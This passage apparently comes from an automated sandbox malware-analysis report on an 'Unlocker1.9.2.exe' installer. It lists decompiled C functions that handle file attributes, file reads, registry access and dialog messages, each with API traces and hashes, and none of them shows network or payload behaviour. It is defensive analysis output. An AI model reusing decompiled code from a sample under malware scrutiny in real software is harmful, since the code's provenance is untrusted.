                                                                                                                                                              • Instruction ID: 6b7a785092ec91fc8b74b141f8716fcdbeee11c7e0160613a2a2c5ad315415b5
                                                                                                                                                              • Opcode Fuzzy Hash: 180e04144bc7a0d59582f7e45b03d1942a0b442326c071ed28d9fde4447ebb30
                                                                                                                                                              • Instruction Fuzzy Hash: 96E0C272F08210DBD710FBB4AE899AE3674DB403A9B10453BF503F20C1D2B89C8196EE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004056B4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E004056B4(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                              0x004056b8
                                                                                                                                                              0x004056c5
                                                                                                                                                              0x004056da
                                                                                                                                                              0x004056e0

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 004056B8
                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                              • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                              • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                                                                              • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                                                                              • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040344C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040344C() {
				void* _t1;
				void* _t3;
				void* _t5;
				signed int _t7;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t7 =  *0x409014;
				}
				E00403491();
				_t3 = E00405302(_t5, _t7, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsv5446.tmp\\", 7); // executed
				return _t3;
			}







                                                                                                                                                              0x0040344c
                                                                                                                                                              0x00403454
                                                                                                                                                              0x00403457
                                                                                                                                                              0x0040345d
                                                                                                                                                              0x0040345d
                                                                                                                                                              0x0040345d
                                                                                                                                                              0x00403464
                                                                                                                                                              0x00403470
                                                                                                                                                              0x00403475

                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv5446.tmp\, xrefs: 0040346B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\
                                                                                                                                                              • API String ID: 2962429428-4210766794
                                                                                                                                                              • Opcode ID: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                                                                                                                                              • Instruction ID: 2202cf36b8f848177cc2ffd66234e305818bf21466fa1b02f98de814e748bada
                                                                                                                                                              • Opcode Fuzzy Hash: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                                                                                                                                              • Instruction Fuzzy Hash: E5C0123060470096D6206F799E4F5063A18574073AB904326F1B5B40F2C77C5901893F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405695 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405695(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                                                                                                                                              0x00405699
                                                                                                                                                              0x004056a2
                                                                                                                                                              0x004056ab
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004056ab
                                                                                                                                                              0x004056b1

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004056AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                                                              • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
                                                                                                                                                              • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                                                              • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402223 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402223(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E004029F6(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E004029F6(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
					_t11 = E004029F6(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E004029F6(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                                                                                                                                              0x00402223
                                                                                                                                                              0x00402223
                                                                                                                                                              0x00402225
                                                                                                                                                              0x00402229
                                                                                                                                                              0x0040222c
                                                                                                                                                              0x00402234
                                                                                                                                                              0x00402238
                                                                                                                                                              0x00402241
                                                                                                                                                              0x00402241
                                                                                                                                                              0x00402246
                                                                                                                                                              0x0040224f
                                                                                                                                                              0x0040224f
                                                                                                                                                              0x0040225c
                                                                                                                                                              0x004015a6
                                                                                                                                                              0x004015a8
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040225C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                              • Opcode ID: b6116c209c80720ea8c5b66b32d343bdc214f8bf2523826a10554ae8e2aaa3ef
                                                                                                                                                              • Instruction ID: 7f0f3d0bfb11d3a69440f7e30d7772d63b8707f304f836d716d69bda9ce5b450
                                                                                                                                                              • Opcode Fuzzy Hash: b6116c209c80720ea8c5b66b32d343bdc214f8bf2523826a10554ae8e2aaa3ef
                                                                                                                                                              • Instruction Fuzzy Hash: 31E04871F002656BDBA07AF14F8D97F115C7B84344F14027EBA15762C6E9BC4D416169
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040304E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040304E(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                              0x00403052
                                                                                                                                                              0x00403065
                                                                                                                                                              0x0040306d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403074
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403076

                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                                                              • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                                                                                                                                              • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                                                              • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402B00 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00402B00(void* __eflags, void* _a4) {
				signed int _t6;
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t6 =  *0x423f30; // 0x100
				_t8 = E004029F6(0x22);
				_t9 =  *0x409b48; // 0x19f570
				_t11 = RegOpenKeyExA(E00402AEB( *((intOrPtr*)(_t9 + 4))), _t8, 0, _t6 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}







                                                                                                                                                              0x00402b07
                                                                                                                                                              0x00402b14
                                                                                                                                                              0x00402b1a
                                                                                                                                                              0x00402b28
                                                                                                                                                              0x00402b30
                                                                                                                                                              0x00402b38

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: 75536f55a61c7ddeae545d3e58a4254d3b1e603d9243d6840a97648cae86c977
                                                                                                                                                              • Instruction ID: b114426f85d9896a426a267f97d2c69b4d85675bc1c8818fcc54ad92fcdded5e
                                                                                                                                                              • Opcode Fuzzy Hash: 75536f55a61c7ddeae545d3e58a4254d3b1e603d9243d6840a97648cae86c977
                                                                                                                                                              • Instruction Fuzzy Hash: D5E08CB6650108BFDB50EFA4ED4BFDA77ECBB04340F008821BA08E7091CA78E5409B68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403D8F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403D8F(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004059FF(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}









                                                                                                                                                              0x00403da9
                                                                                                                                                              0x00403dae

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                                              • Opcode ID: 1a099d3bd65285bc0f9a8825a9e07570eefe01f436bdd2ad6c1ebea1d3a073c8
                                                                                                                                                              • Instruction ID: 5f24766654b0959f9fafa4a482421e3f7ee2751b64636ea9b5eff0debf90db41
                                                                                                                                                              • Opcode Fuzzy Hash: 1a099d3bd65285bc0f9a8825a9e07570eefe01f436bdd2ad6c1ebea1d3a073c8
                                                                                                                                                              • Instruction Fuzzy Hash: 1CC04C76148600BFD641E755CC42F1FB799EFA4325F00C52EB15CA11D1CA3588209F26
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DDB(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x423658; // 0x14005a
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                                                              0x00403ddb
                                                                                                                                                              0x00403de2
                                                                                                                                                              0x00403ded
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ded
                                                                                                                                                              0x00403df3

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 26eb61eee2f8dbf044ce35a143100ca30312b2da0147e559357940c095fae958
                                                                                                                                                              • Instruction ID: 0e8439f77210545f6c91de949863756b753435ab215934436bbdbfed1b8c9049
                                                                                                                                                              • Opcode Fuzzy Hash: 26eb61eee2f8dbf044ce35a143100ca30312b2da0147e559357940c095fae958
                                                                                                                                                              • Instruction Fuzzy Hash: A6C08C707402017BDA208F109D45F033768AB10701F0040347200A01D0C634E100D61C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403DC4(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x423e88, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                                                                                              0x00403dd2
                                                                                                                                                              0x00403dd8

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 9b8c2a1a4dccebde683369f87605a88067a0545aeab7591961bdf6cdb6557e70
                                                                                                                                                              • Instruction ID: 852617af31e01c2ae6d6bbe4641feff1a9708b3e48e1883f9033c05fa9abbd48
                                                                                                                                                              • Opcode Fuzzy Hash: 9b8c2a1a4dccebde683369f87605a88067a0545aeab7591961bdf6cdb6557e70
                                                                                                                                                              • Instruction Fuzzy Hash: 38B01276BC4201BBDE216F00DE09F457E72E764702F018078B304240F0C6F240A5DB09
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403080 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403080(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                              0x0040308e
                                                                                                                                                              0x00403094

                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,0000CDE4), ref: 0040308E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                                                              • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                                                              • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                                                              • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405282 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405282(int _a4, CHAR* _a8) {
				int _t3;

				_t3 = GetDlgItemTextA( *0x423658, _a4, _a8, 0x400); // executed
				return _t3;
			}




                                                                                                                                                              0x00405295
                                                                                                                                                              0x0040529b

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
